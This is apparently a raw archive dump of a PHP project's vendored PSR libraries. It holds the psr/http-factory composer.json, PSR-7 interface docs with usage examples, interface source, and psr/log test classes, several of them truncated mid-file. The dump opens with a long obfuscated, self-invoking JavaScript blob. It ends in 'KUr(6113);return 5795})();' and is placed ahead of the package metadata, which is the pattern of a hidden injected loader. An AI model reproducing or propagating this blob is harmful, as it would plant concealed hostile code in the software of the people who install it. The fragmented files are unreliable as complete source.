7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();{ "name": "psr/http-factory", "description": "Common interfaces for PSR-7 HTTP message factories", "keywords": [ "psr", "psr-7", "psr-17", "http", "factory", "message", "request", "response" ], "license": "MIT", "authors": [ { "name": "PHP-FIG", "homepage": "https://www.php-fig.org/" } ], "require": { "php": ">=7.0.0", "psr/http-message": "^1.0 || ^2.0" }, "autoload": { "psr-4": { "Psr\\Http\\Message\\": "src/" } }, "extra": { "branch-alias": { "dev-master": "1.0.x-dev" } } } google-api/vendor/psr/http-message/docs/PSR7-Interfaces.md000064400000022514147600400120017355 0ustar00# Interfaces The purpose of this list is to help in finding the methods when working with PSR-7. This can be considered as a cheatsheet for PSR-7 interfaces. The interfaces defined in PSR-7 are the following: | Class Name | Description | |---|---| | [Psr\Http\Message\MessageInterface](http://www.php-fig.org/psr/psr-7/#psrhttpmessagemessageinterface) | Representation of a HTTP message | | [Psr\Http\Message\RequestInterface](http://www.php-fig.org/psr/psr-7/#psrhttpmessagerequestinterface) | Representation of an outgoing, client-side request. | | [Psr\Http\Message\ServerRequestInterface](http://www.php-fig.org/psr/psr-7/#psrhttpmessageserverrequestinterface) | Representation of an incoming, server-side HTTP request. | | [Psr\Http\Message\ResponseInterface](http://www.php-fig.org/psr/psr-7/#psrhttpmessageresponseinterface) | Representation of an outgoing, server-side response. | | [Psr\Http\Message\StreamInterface](http://www.php-fig.org/psr/psr-7/#psrhttpmessagestreaminterface) | Describes a data stream | | [Psr\Http\Message\UriInterface](http://www.php-fig.org/psr/psr-7/#psrhttpmessageuriinterface) | Value object representing a URI. | | [Psr\Http\Message\UploadedFileInterface](http://www.php-fig.org/psr/psr-7/#psrhttpmessageuploadedfileinterface) | Value object representing a file uploaded through an HTTP request. | ## `Psr\Http\Message\MessageInterface` Methods | Method Name | Description | Notes | |------------------------------------| ----------- | ----- | | `getProtocolVersion()` | Retrieve HTTP protocol version | 1.0 or 1.1 | | `withProtocolVersion($version)` | Returns new message instance with given HTTP protocol version | | | `getHeaders()` | Retrieve all HTTP Headers | [Request Header List](https://en.wikipedia.org/wiki/List_of_HTTP_header_fields#Request_fields), [Response Header List](https://en.wikipedia.org/wiki/List_of_HTTP_header_fields#Response_fields) | | `hasHeader($name)` | Checks if HTTP Header with given name exists | | | `getHeader($name)` | Retrieves a array with the values for a single header | | | `getHeaderLine($name)` | Retrieves a comma-separated string of the values for a single header | | | `withHeader($name, $value)` | Returns new message instance with given HTTP Header | if the header existed in the original instance, replaces the header value from the original message with the value provided when creating the new instance. | | `withAddedHeader($name, $value)` | Returns new message instance with appended value to given header | If header already exists value will be appended, if not a new header will be created | | `withoutHeader($name)` | Removes HTTP Header with given name| | | `getBody()` | Retrieves the HTTP Message Body | Returns object implementing `StreamInterface`| | `withBody(StreamInterface $body)` | Returns new message instance with given HTTP Message Body | | ## `Psr\Http\Message\RequestInterface` Methods Same methods as `Psr\Http\Message\MessageInterface` + the following methods: | Method Name | Description | Notes | |------------------------------------| ----------- | ----- | | `getRequestTarget()` | Retrieves the message's request target | origin-form, absolute-form, authority-form, asterisk-form ([RFC7230](https://www.rfc-editor.org/rfc/rfc7230.txt)) | | `withRequestTarget($requestTarget)` | Return a new message instance with the specific request-target | | | `getMethod()` | Retrieves the HTTP method of the request. | GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE (defined in [RFC7231](https://tools.ietf.org/html/rfc7231)), PATCH (defined in [RFC5789](https://tools.ietf.org/html/rfc5789)) | | `withMethod($method)` | Returns a new message instance with the provided HTTP method | | | `getUri()` | Retrieves the URI instance | | | `withUri(UriInterface $uri, $preserveHost = false)` | Returns a new message instance with the provided URI | | ## `Psr\Http\Message\ServerRequestInterface` Methods Same methods as `Psr\Http\Message\RequestInterface` + the following methods: | Method Name | Description | Notes | |------------------------------------| ----------- | ----- | | `getServerParams() ` | Retrieve server parameters | Typically derived from `$_SERVER` | | `getCookieParams()` | Retrieves cookies sent by the client to the server. | Typically derived from `$_COOKIES` | | `withCookieParams(array $cookies)` | Returns a new request instance with the specified cookies | | | `withQueryParams(array $query)` | Returns a new request instance with the specified query string arguments | | | `getUploadedFiles()` | Retrieve normalized file upload data | | | `withUploadedFiles(array $uploadedFiles)` | Returns a new request instance with the specified uploaded files | | | `getParsedBody()` | Retrieve any parameters provided in the request body | | | `withParsedBody($data)` | Returns a new request instance with the specified body parameters | | | `getAttributes()` | Retrieve attributes derived from the request | | | `getAttribute($name, $default = null)` | Retrieve a single derived request attribute | | | `withAttribute($name, $value)` | Returns a new request instance with the specified derived request attribute | | | `withoutAttribute($name)` | Returns a new request instance that without the specified derived request attribute | | ## `Psr\Http\Message\ResponseInterface` Methods: Same methods as `Psr\Http\Message\MessageInterface` + the following methods: | Method Name | Description | Notes | |------------------------------------| ----------- | ----- | | `getStatusCode()` | Gets the response status code. | | | `withStatus($code, $reasonPhrase = '')` | Returns a new response instance with the specified status code and, optionally, reason phrase. | | | `getReasonPhrase()` | Gets the response reason phrase associated with the status code. | | ## `Psr\Http\Message\StreamInterface` Methods | Method Name | Description | Notes | |------------------------------------| ----------- | ----- | | `__toString()` | Reads all data from the stream into a string, from the beginning to end. | | | `close()` | Closes the stream and any underlying resources. | | | `detach()` | Separates any underlying resources from the stream. | | | `getSize()` | Get the size of the stream if known. | | | `eof()` | Returns true if the stream is at the end of the stream.| | | `isSeekable()` | Returns whether or not the stream is seekable. | | | `seek($offset, $whence = SEEK_SET)` | Seek to a position in the stream. | | | `rewind()` | Seek to the beginning of the stream. | | | `isWritable()` | Returns whether or not the stream is writable. | | | `write($string)` | Write data to the stream. | | | `isReadable()` | Returns whether or not the stream is readable. | | | `read($length)` | Read data from the stream. | | | `getContents()` | Returns the remaining contents in a string | | | `getMetadata($key = null)()` | Get stream metadata as an associative array or retrieve a specific key. | | ## `Psr\Http\Message\UriInterface` Methods | Method Name | Description | Notes | |------------------------------------| ----------- | ----- | | `getScheme()` | Retrieve the scheme component of the URI. | | | `getAuthority()` | Retrieve the authority component of the URI. | | | `getUserInfo()` | Retrieve the user information component of the URI. | | | `getHost()` | Retrieve the host component of the URI. | | | `getPort()` | Retrieve the port component of the URI. | | | `getPath()` | Retrieve the path component of the URI. | | | `getQuery()` | Retrieve the query string of the URI. | | | `getFragment()` | Retrieve the fragment component of the URI. | | | `withScheme($scheme)` | Return an instance with the specified scheme. | | | `withUserInfo($user, $password = null)` | Return an instance with the specified user information. | | | `withHost($host)` | Return an instance with the specified host. | | | `withPort($port)` | Return an instance with the specified port. | | | `withPath($path)` | Return an instance with the specified path. | | | `withQuery($query)` | Return an instance with the specified query string. | | | `withFragment($fragment)` | Return an instance with the specified URI fragment. | | | `__toString()` | Return the string representation as a URI reference. | | ## `Psr\Http\Message\UploadedFileInterface` Methods | Method Name | Description | Notes | |------------------------------------| ----------- | ----- | | `getStream()` | Retrieve a stream representing the uploaded file. | | | `moveTo($targetPath)` | Move the uploaded file to a new location. | | | `getSize()` | Retrieve the file size. | | | `getError()` | Retrieve the error associated with the uploaded file. | | | `getClientFilename()` | Retrieve the filename sent by the client. | | | `getClientMediaType()` | Retrieve the media type sent by the client. | | > `RequestInterface`, `ServerRequestInterface`, `ResponseInterface` extend `MessageInterface` because the `Request` and the `Response` are `HTTP Messages`. > When using `ServerRequestInterface`, both `RequestInterface` and `Psr\Http\Message\MessageInterface` methods are considered. google-api/vendor/psr/http-message/docs/PSR7-Usage.md000064400000012564147600400120016342 0ustar00### PSR-7 Usage All PSR-7 applications comply with these interfaces They were created to establish a standard between middleware implementations. > `RequestInterface`, `ServerRequestInterface`, `ResponseInterface` extend `MessageInterface` because the `Request` and the `Response` are `HTTP Messages`. > When using `ServerRequestInterface`, both `RequestInterface` and `Psr\Http\Message\MessageInterface` methods are considered. The following examples will illustrate how basic operations are done in PSR-7. ##### Examples For this examples to work (at least) a PSR-7 implementation package is required. (eg: zendframework/zend-diactoros, guzzlehttp/psr7, slim/slim, etc) All PSR-7 implementations should have the same behaviour. The following will be assumed: `$request` is an object of `Psr\Http\Message\RequestInterface` and `$response` is an object implementing `Psr\Http\Message\RequestInterface` ### Working with HTTP Headers #### Adding headers to response: ```php $response->withHeader('My-Custom-Header', 'My Custom Message'); ``` #### Appending values to headers ```php $response->withAddedHeader('My-Custom-Header', 'The second message'); ``` #### Checking if header exists: ```php $request->hasHeader('My-Custom-Header'); // will return false $response->hasHeader('My-Custom-Header'); // will return true ``` > Note: My-Custom-Header was only added in the Response #### Getting comma-separated values from a header (also applies to request) ```php // getting value from request headers $request->getHeaderLine('Content-Type'); // will return: "text/html; charset=UTF-8" // getting value from response headers $response->getHeaderLine('My-Custom-Header'); // will return: "My Custom Message; The second message" ``` #### Getting array of value from a header (also applies to request) ```php // getting value from request headers $request->getHeader('Content-Type'); // will return: ["text/html", "charset=UTF-8"] // getting value from response headers $response->getHeader('My-Custom-Header'); // will return: ["My Custom Message", "The second message"] ``` #### Removing headers from HTTP Messages ```php // removing a header from Request, removing deprecated "Content-MD5" header $request->withoutHeader('Content-MD5'); // removing a header from Response // effect: the browser won't know the size of the stream // the browser will download the stream till it ends $response->withoutHeader('Content-Length'); ``` ### Working with HTTP Message Body When working with the PSR-7 there are two methods of implementation: #### 1. Getting the body separately > This method makes the body handling easier to understand and is useful when repeatedly calling body methods. (You only call `getBody()` once). Using this method mistakes like `$response->write()` are also prevented. ```php $body = $response->getBody(); // operations on body, eg. read, write, seek // ... // replacing the old body $response->withBody($body); // this last statement is optional as we working with objects // in this case the "new" body is same with the "old" one // the $body variable has the same value as the one in $request, only the reference is passed ``` #### 2. Working directly on response > This method is useful when only performing few operations as the `$request->getBody()` statement fragment is required ```php $response->getBody()->write('hello'); ``` ### Getting the body contents The following snippet gets the contents of a stream contents. > Note: Streams must be rewinded, if content was written into streams, it will be ignored when calling `getContents()` because the stream pointer is set to the last character, which is `\0` - meaning end of stream. ```php $body = $response->getBody(); $body->rewind(); // or $body->seek(0); $bodyText = $body->getContents(); ``` > Note: If `$body->seek(1)` is called before `$body->getContents()`, the first character will be ommited as the starting pointer is set to `1`, not `0`. This is why using `$body->rewind()` is recommended. ### Append to body ```php $response->getBody()->write('Hello'); // writing directly $body = $request->getBody(); // which is a `StreamInterface` $body->write('xxxxx'); ``` ### Prepend to body Prepending is different when it comes to streams. The content must be copied before writing the content to be prepended. The following example will explain the behaviour of streams. ```php // assuming our response is initially empty $body = $repsonse->getBody(); // writing the string "abcd" $body->write('abcd'); // seeking to start of stream $body->seek(0); // writing 'ef' $body->write('ef'); // at this point the stream contains "efcd" ``` #### Prepending by rewriting separately ```php // assuming our response body stream only contains: "abcd" $body = $response->getBody(); $body->rewind(); $contents = $body->getContents(); // abcd // seeking the stream to beginning $body->rewind(); $body->write('ef'); // stream contains "efcd" $body->write($contents); // stream contains "efabcd" ``` > Note: `getContents()` seeks the stream while reading it, therefore if the second `rewind()` method call was not present the stream would have resulted in `abcdefabcd` because the `write()` method appends to stream if not preceeded by `rewind()` or `seek(0)`. #### Prepending by using contents as a string ```php $body = $response->getBody(); $body->rewind(); $contents = $body->getContents(); // efabcd $contents = 'ef'.$contents; $body->rewind(); $body->write($contents); ``` google-api/vendor/psr/http-message/src/StreamInterface.php000064400000011374147600400120017645 0ustar00 * [user-info@]host[:port] * * * If the port component is not set or is the standard port for the current * scheme, it SHOULD NOT be included. * * @see https://tools.ietf.org/html/rfc3986#section-3.2 * @return string The URI authority, in "[user-info@]host[:port]" format. */ public function getAuthority(): string; /** * Retrieve the user information component of the URI. * * If no user information is present, this method MUST return an empty * string. * * If a user is present in the URI, this will return that value; * additionally, if the password is also present, it will be appended to the * user value, with a colon (":") separating the values. * * The trailing "@" character is not part of the user information and MUST * NOT be added. * * @return string The URI user information, in "username[:password]" format. */ public function getUserInfo(): string; /** * Retrieve the host component of the URI. * * If no host is present, this method MUST return an empty string. * * The value returned MUST be normalized to lowercase, per RFC 3986 * Section 3.2.2. * * @see http://tools.ietf.org/html/rfc3986#section-3.2.2 * @return string The URI host. */ public function getHost(): string; /** * Retrieve the port component of the URI. * * If a port is present, and it is non-standard for the current scheme, * this method MUST return it as an integer. If the port is the standard port * used with the current scheme, this method SHOULD return null. * * If no port is present, and no scheme is present, this method MUST return * a null value. * * If no port is present, but a scheme is present, this method MAY return * the standard port for that scheme, but SHOULD return null. * * @return null|int The URI port. */ public function getPort(): ?int; /** * Retrieve the path component of the URI. * * The path can either be empty or absolute (starting with a slash) or * rootless (not starting with a slash). Implementations MUST support all * three syntaxes. * * Normally, the empty path "" and absolute path "/" are considered equal as * defined in RFC 7230 Section 2.7.3. But this method MUST NOT automatically * do this normalization because in contexts with a trimmed base path, e.g. * the front controller, this difference becomes significant. It's the task * of the user to handle both "" and "/". * * The value returned MUST be percent-encoded, but MUST NOT double-encode * any characters. To determine what characters to encode, please refer to * RFC 3986, Sections 2 and 3.3. * * As an example, if the value should include a slash ("/") not intended as * delimiter between path segments, that value MUST be passed in encoded * form (e.g., "%2F") to the instance. * * @see https://tools.ietf.org/html/rfc3986#section-2 * @see https://tools.ietf.org/html/rfc3986#section-3.3 * @return string The URI path. */ public function getPath(): string; /** * Retrieve the query string of the URI. * * If no query string is present, this method MUST return an empty string. * * The leading "?" character is not part of the query and MUST NOT be * added. * * The value returned MUST be percent-encoded, but MUST NOT double-encode * any characters. To determine what characters to encode, please refer to * RFC 3986, Sections 2 and 3.4. * * As an example, if a value in a key/value pair of the query string should * include an ampersand ("&") not intended as a delimiter between values, * that value MUST be passed in encoded form (e.g., "%26") to the instance. * * @see https://tools.ietf.org/html/rfc3986#section-2 * @see https://tools.ietf.org/html/rfc3986#section-3.4 * @return string The URI query string. */ public function getQuery(): string; /** * Retrieve the fragment component of the URI. * * If no fragment is present, this method MUST return an empty string. * * The leading "#" character is not part of the fragment and MUST NOT be * added. * * The value returned MUST be percent-encoded, but MUST NOT double-encode * any characters. To determine what characters to encode, please refer to * RFC 3986, Sections 2 and 3.5. * * @see https://tools.ietf.org/html/rfc3986#section-2 * @see https://tools.ietf.org/html/rfc3986#section-3.5 * @return string The URI fragment. */ public function getFragment(): string; /** * Return an instance with the specified scheme. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified scheme. * * Implementations MUST support the schemes "http" and "https" case * insensitively, and MAY accommodate other schemes if required. * * An empty scheme is equivalent to removing the scheme. * * @param string $scheme The scheme to use with the new instance. * @return static A new instance with the specified scheme. * @throws \InvalidArgumentException for invalid or unsupported schemes. */ public function withScheme(string $scheme): UriInterface; /** * Return an instance with the specified user information. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified user information. * * Password is optional, but the user information MUST include the * user; an empty string for the user is equivalent to removing user * information. * * @param string $user The user name to use for authority. * @param null|string $password The password associated with $user. * @return static A new instance with the specified user information. */ public function withUserInfo(string $user, ?string $password = null): UriInterface; /** * Return an instance with the specified host. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified host. * * An empty host value is equivalent to removing the host. * * @param string $host The hostname to use with the new instance. * @return static A new instance with the specified host. * @throws \InvalidArgumentException for invalid hostnames. */ public function withHost(string $host): UriInterface; /** * Return an instance with the specified port. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified port. * * Implementations MUST raise an exception for ports outside the * established TCP and UDP port ranges. * * A null value provided for the port is equivalent to removing the port * information. * * @param null|int $port The port to use with the new instance; a null value * removes the port information. * @return static A new instance with the specified port. * @throws \InvalidArgumentException for invalid ports. */ public function withPort(?int $port): UriInterface; /** * Return an instance with the specified path. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified path. * * The path can either be empty or absolute (starting with a slash) or * rootless (not starting with a slash). Implementations MUST support all * three syntaxes. * * If the path is intended to be domain-relative rather than path relative then * it must begin with a slash ("/"). Paths not starting with a slash ("/") * are assumed to be relative to some base path known to the application or * consumer. * * Users can provide both encoded and decoded path characters. * Implementations ensure the correct encoding as outlined in getPath(). * * @param string $path The path to use with the new instance. * @return static A new instance with the specified path. * @throws \InvalidArgumentException for invalid paths. */ public function withPath(string $path): UriInterface; /** * Return an instance with the specified query string. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified query string. * * Users can provide both encoded and decoded query characters. * Implementations ensure the correct encoding as outlined in getQuery(). * * An empty query string value is equivalent to removing the query string. * * @param string $query The query string to use with the new instance. * @return static A new instance with the specified query string. * @throws \InvalidArgumentException for invalid query strings. */ public function withQuery(string $query): UriInterface; /** * Return an instance with the specified URI fragment. * * This method MUST retain the state of the current instance, and return * an instance that contains the specified URI fragment. * * Users can provide both encoded and decoded fragment characters. * Implementations ensure the correct encoding as outlined in getFragment(). * * An empty fragment value is equivalent to removing the fragment. * * @param string $fragment The fragment to use with the new instance. * @return static A new instance with the specified fragment. */ public function withFragment(string $fragment): UriInterface; /** * Return the string representation as a URI reference. * * Depending on which components of the URI are present, the resulting * string is either a full URI or relative reference according to RFC 3986, * Section 4.1. The method concatenates the various components of the URI, * using the appropriate delimiters: * * - If a scheme is present, it MUST be suffixed by ":". * - If an authority is present, it MUST be prefixed by "//". * - The path can be concatenated without delimiters. But there are two * cases where the path has to be adjusted to make the URI reference * valid as PHP does not allow to throw an exception in __toString(): * - If the path is rootless and an authority is present, the path MUST * be prefixed by "/". * - If the path is starting with more than one "/" and no authority is * present, the starting slashes MUST be reduced to one. * - If a query is present, it MUST be prefixed by "?". * - If a fragment is present, it MUST be prefixed by "#". * * @see http://tools.ietf.org/html/rfc3986#section-4.1 * @return string */ public function __toString(): string; } google-api/vendor/psr/http-message/src/UploadedFileInterface.php000064400000011214147600400120020740 0ustar00getQuery()` * or from the `QUERY_STRING` server param. * * @return array */ public function getQueryParams(): array; /** * Return an instance with the specified query string arguments. * * These values SHOULD remain immutable over the course of the incoming * request. They MAY be injected during instantiation, such as from PHP's * $_GET superglobal, or MAY be derived from some other value such as the * URI. In cases where the arguments are parsed from the URI, the data * MUST be compatible with what PHP's parse_str() would return for * purposes of how duplicate query parameters are handled, and how nested * sets are handled. * * Setting query string arguments MUST NOT change the URI stored by the * request, nor the values in the server params. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * updated query string arguments. * * @param array $query Array of query string arguments, typically from * $_GET. * @return static */ public function withQueryParams(array $query): ServerRequestInterface; /** * Retrieve normalized file upload data. * * This method returns upload metadata in a normalized tree, with each leaf * an instance of Psr\Http\Message\UploadedFileInterface. * * These values MAY be prepared from $_FILES or the message body during * instantiation, or MAY be injected via withUploadedFiles(). * * @return array An array tree of UploadedFileInterface instances; an empty * array MUST be returned if no data is present. */ public function getUploadedFiles(): array; /** * Create a new instance with the specified uploaded files. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * updated body parameters. * * @param array $uploadedFiles An array tree of UploadedFileInterface instances. * @return static * @throws \InvalidArgumentException if an invalid structure is provided. */ public function withUploadedFiles(array $uploadedFiles): ServerRequestInterface; /** * Retrieve any parameters provided in the request body. * * If the request Content-Type is either application/x-www-form-urlencoded * or multipart/form-data, and the request method is POST, this method MUST * return the contents of $_POST. * * Otherwise, this method may return any results of deserializing * the request body content; as parsing returns structured content, the * potential types MUST be arrays or objects only. A null value indicates * the absence of body content. * * @return null|array|object The deserialized body parameters, if any. * These will typically be an array or object. */ public function getParsedBody(); /** * Return an instance with the specified body parameters. * * These MAY be injected during instantiation. * * If the request Content-Type is either application/x-www-form-urlencoded * or multipart/form-data, and the request method is POST, use this method * ONLY to inject the contents of $_POST. * * The data IS NOT REQUIRED to come from $_POST, but MUST be the results of * deserializing the request body content. Deserialization/parsing returns * structured data, and, as such, this method ONLY accepts arrays or objects, * or a null value if nothing was available to parse. * * As an example, if content negotiation determines that the request data * is a JSON payload, this method could be used to create a request * instance with the deserialized parameters. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * updated body parameters. * * @param null|array|object $data The deserialized body data. This will * typically be in an array or object. * @return static * @throws \InvalidArgumentException if an unsupported argument type is * provided. */ public function withParsedBody($data): ServerRequestInterface; /** * Retrieve attributes derived from the request. * * The request "attributes" may be used to allow injection of any * parameters derived from the request: e.g., the results of path * match operations; the results of decrypting cookies; the results of * deserializing non-form-encoded message bodies; etc. Attributes * will be application and request specific, and CAN be mutable. * * @return array Attributes derived from the request. */ public function getAttributes(): array; /** * Retrieve a single derived request attribute. * * Retrieves a single derived request attribute as described in * getAttributes(). If the attribute has not been previously set, returns * the default value as provided. * * This method obviates the need for a hasAttribute() method, as it allows * specifying a default value to return if the attribute is not found. * * @see getAttributes() * @param string $name The attribute name. * @param mixed $default Default value to return if the attribute does not exist. * @return mixed */ public function getAttribute(string $name, $default = null); /** * Return an instance with the specified derived request attribute. * * This method allows setting a single derived request attribute as * described in getAttributes(). * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * updated attribute. * * @see getAttributes() * @param string $name The attribute name. * @param mixed $value The value of the attribute. * @return static */ public function withAttribute(string $name, $value): ServerRequestInterface; /** * Return an instance that removes the specified derived request attribute. * * This method allows removing a single derived request attribute as * described in getAttributes(). * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that removes * the attribute. * * @see getAttributes() * @param string $name The attribute name. * @return static */ public function withoutAttribute(string $name): ServerRequestInterface; } google-api/vendor/psr/http-message/src/MessageInterface.php000064400000015676147600400120020007 0ustar00getHeaders() as $name => $values) { * echo $name . ": " . implode(", ", $values); * } * * // Emit headers iteratively: * foreach ($message->getHeaders() as $name => $values) { * foreach ($values as $value) { * header(sprintf('%s: %s', $name, $value), false); * } * } * * While header names are not case-sensitive, getHeaders() will preserve the * exact case in which headers were originally specified. * * @return string[][] Returns an associative array of the message's headers. Each * key MUST be a header name, and each value MUST be an array of strings * for that header. */ public function getHeaders(): array; /** * Checks if a header exists by the given case-insensitive name. * * @param string $name Case-insensitive header field name. * @return bool Returns true if any header names match the given header * name using a case-insensitive string comparison. Returns false if * no matching header name is found in the message. */ public function hasHeader(string $name): bool; /** * Retrieves a message header value by the given case-insensitive name. * * This method returns an array of all the header values of the given * case-insensitive header name. * * If the header does not appear in the message, this method MUST return an * empty array. * * @param string $name Case-insensitive header field name. * @return string[] An array of string values as provided for the given * header. If the header does not appear in the message, this method MUST * return an empty array. */ public function getHeader(string $name): array; /** * Retrieves a comma-separated string of the values for a single header. * * This method returns all of the header values of the given * case-insensitive header name as a string concatenated together using * a comma. * * NOTE: Not all header values may be appropriately represented using * comma concatenation. For such headers, use getHeader() instead * and supply your own delimiter when concatenating. * * If the header does not appear in the message, this method MUST return * an empty string. * * @param string $name Case-insensitive header field name. * @return string A string of values as provided for the given header * concatenated together using a comma. If the header does not appear in * the message, this method MUST return an empty string. */ public function getHeaderLine(string $name): string; /** * Return an instance with the provided value replacing the specified header. * * While header names are case-insensitive, the casing of the header will * be preserved by this function, and returned from getHeaders(). * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * new and/or updated header and value. * * @param string $name Case-insensitive header field name. * @param string|string[] $value Header value(s). * @return static * @throws \InvalidArgumentException for invalid header names or values. */ public function withHeader(string $name, $value): MessageInterface; /** * Return an instance with the specified header appended with the given value. * * Existing values for the specified header will be maintained. The new * value(s) will be appended to the existing list. If the header did not * exist previously, it will be added. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * new header and/or value. * * @param string $name Case-insensitive header field name to add. * @param string|string[] $value Header value(s). * @return static * @throws \InvalidArgumentException for invalid header names or values. */ public function withAddedHeader(string $name, $value): MessageInterface; /** * Return an instance without the specified header. * * Header resolution MUST be done without case-sensitivity. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that removes * the named header. * * @param string $name Case-insensitive header field name to remove. * @return static */ public function withoutHeader(string $name): MessageInterface; /** * Gets the body of the message. * * @return StreamInterface Returns the body as a stream. */ public function getBody(): StreamInterface; /** * Return an instance with the specified message body. * * The body MUST be a StreamInterface object. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return a new instance that has the * new body stream. * * @param StreamInterface $body Body. * @return static * @throws \InvalidArgumentException When the body is not valid. */ public function withBody(StreamInterface $body): MessageInterface; } google-api/vendor/psr/http-message/src/RequestInterface.php000064400000011467147600400120020045 0ustar00 ". * * Example ->error('Foo') would yield "error Foo". * * @return string[] */ abstract public function getLogs(); public function testImplements() { $this->assertInstanceOf('Psr\Log\LoggerInterface', $this->getLogger()); } /** * @dataProvider provideLevelsAndMessages */ public function testLogsAtAllLevels($level, $message) { $logger = $this->getLogger(); $logger->{$level}($message, array('user' => 'Bob')); $logger->log($level, $message, array('user' => 'Bob')); $expected = array( $level.' message of level '.$level.' with context: Bob', $level.' message of level '.$level.' with context: Bob', ); $this->assertEquals($expected, $this->getLogs()); } public function provideLevelsAndMessages() { return array( LogLevel::EMERGENCY => array(LogLevel::EMERGENCY, 'message of level emergency with context: {user}'), LogLevel::ALERT => array(LogLevel::ALERT, 'message of level alert with context: {user}'), LogLevel::CRITICAL => array(LogLevel::CRITICAL, 'message of level critical with context: {user}'), LogLevel::ERROR => array(LogLevel::ERROR, 'message of level error with context: {user}'), LogLevel::WARNING => array(LogLevel::WARNING, 'message of level warning with context: {user}'), LogLevel::NOTICE => array(LogLevel::NOTICE, 'message of level notice with context: {user}'), LogLevel::INFO => array(LogLevel::INFO, 'message of level info with context: {user}'), LogLevel::DEBUG => array(LogLevel::DEBUG, 'message of level debug with context: {user}'), ); } /** * @expectedException \Psr\Log\InvalidArgumentException */ public function testThrowsOnInvalidLevel() { $logger = $this->getLogger(); $logger->log('invalid level', 'Foo'); } public function testContextReplacement() { $logger = $this->getLogger(); $logger->info('{Message {nothing} {user} {foo.bar} a}', array('user' => 'Bob', 'foo.bar' => 'Bar')); $expected = array('info {Message {nothing} Bob Bar a}'); $this->assertEquals($expected, $this->getLogs()); } public function testObjectCastToString() { if (method_exists($this, 'createPartialMock')) { $dummy = $this->createPartialMock('Psr\Log\Test\DummyTest', array('__toString')); } else { $dummy = $this->getMock('Psr\Log\Test\DummyTest', array('__toString')); } $dummy->expects($this->once()) ->method('__toString') ->will($this->returnValue('DUMMY')); $this->getLogger()->warning($dummy); $expected = array('warning DUMMY'); $this->assertEquals($expected, $this->getLogs()); } public function testContextCanContainAnything() { $closed = fopen('php://memory', 'r'); fclose($closed); $context = array( 'bool' => true, 'null' => null, 'string' => 'Foo', 'int' => 0, 'float' => 0.5, 'nested' => array('with object' => new DummyTest), 'object' => new \DateTime, 'resource' => fopen('php://memory', 'r'), 'closed' => $closed, ); $this->getLogger()->warning('Crazy context data', $context); $expected = array('warning Crazy context data'); $this->assertEquals($expected, $this->getLogs()); } public function testContextExceptionKeyCanBeExceptionOrOtherValues() { $logger = $this->getLogger(); $logger->warning('Random message', array('exception' => 'oops')); $logger->critical('Uncaught Exception!', array('exception' => new \LogicException('Fail'))); $expected = array( 'warning Random message', 'critical Uncaught Exception!' ); $this->assertEquals($expected, $this->getLogs()); } } google-api/vendor/psr/log/Psr/Log/Test/DummyTest.php000064400000000373147600400120016316 0ustar00 $level, 'message' => $message, 'context' => $context, ]; $this->recordsByLevel[$record['level']][] = $record; $this->records[] = $record; } public function hasRecords($level) { return isset($this->recordsByLevel[$level]); } public function hasRecord($record, $level) { if (is_string($record)) { $record = ['message' => $record]; } return $this->hasRecordThatPasses(function ($rec) use ($record) { if ($rec['message'] !== $record['message']) { return false; } if (isset($record['context']) && $rec['context'] !== $record['context']) { return false; } return true; }, $level); } public function hasRecordThatContains($message, $level) { return $this->hasRecordThatPasses(function ($rec) use ($message) { return strpos($rec['message'], $message) !== false; }, $level); } public function hasRecordThatMatches($regex, $level) { return $this->hasRecordThatPasses(function ($rec) use ($regex) { return preg_match($regex, $rec['message']) > 0; }, $level); } public function hasRecordThatPasses(callable $predicate, $level) { if (!isset($this->recordsByLevel[$level])) { return false; } foreach ($this->recordsByLevel[$level] as $i => $rec) { if 